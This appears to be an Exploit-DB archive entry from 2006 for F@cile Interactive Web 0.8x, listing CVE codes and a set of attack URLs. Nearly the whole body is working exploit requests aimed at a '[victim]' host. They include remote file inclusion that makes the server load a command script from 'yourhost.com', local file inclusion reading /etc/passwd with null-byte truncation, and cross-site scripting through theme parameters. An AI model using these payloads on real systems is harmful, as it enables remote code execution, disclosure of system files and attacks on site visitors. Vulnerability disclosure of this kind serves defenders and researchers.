F@cile Interactive Web 0.8x - Remote File Inclusion / Cross-Site Scripting

Author: nukedx
type: webapps
platform: php
port: 
date_added: 2006-05-27  
date_updated: 2016-07-29  
verified: 1  
codes: OSVDB-26105;CVE-2006-2746;OSVDB-26104;CVE-2006-2745;OSVDB-26103;OSVDB-26102;OSVDB-26101;CVE-2006-2744;OSVDB-26100  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comfacileiw_OS-081.tar.gz  

raw file: 1841.txt  
F@cile Interactive Web <= 0.8x Multiple Remote Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on F@cile Interactive Web <= 0.8x
Original advisory can be found at: http://www.nukedx.com/?viewdoc=35
File Inclusion Vulnerabilities.
http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt?
http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00
http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd
http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php <- php5
http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd
http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php <- php5
http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=/etc/passwd%00
http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=/etc/passwd%00
http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=/etc/passwd%00
http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=/etc/passwd%00
http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=/etc/passwd%00
Cross Site Scripting.
http://[victim]/[FacilePath]/p-themes/lowgraphic/index.inc.php?mytheme=XSS&myskin=XSS
http://[victim]/[FacilePath]/p-themes/classic/index.inc.php?mytheme=XSS&myskin=XSS
http://[victim]/[FacilePath]/p-themes/puzzle/index.inc.php?mytheme=XSS&myskin=XSS
http://[victim]/[FacilePath]/p-themes/simple/index.inc.php?mytheme=XSS&myskin=XSS
http://[victim]/[FacilePath]/p-themes/ciao/index.inc.php?mytheme=XSS&myskin=XSS
Information disclosure
http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=/etc/passwd%00

# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]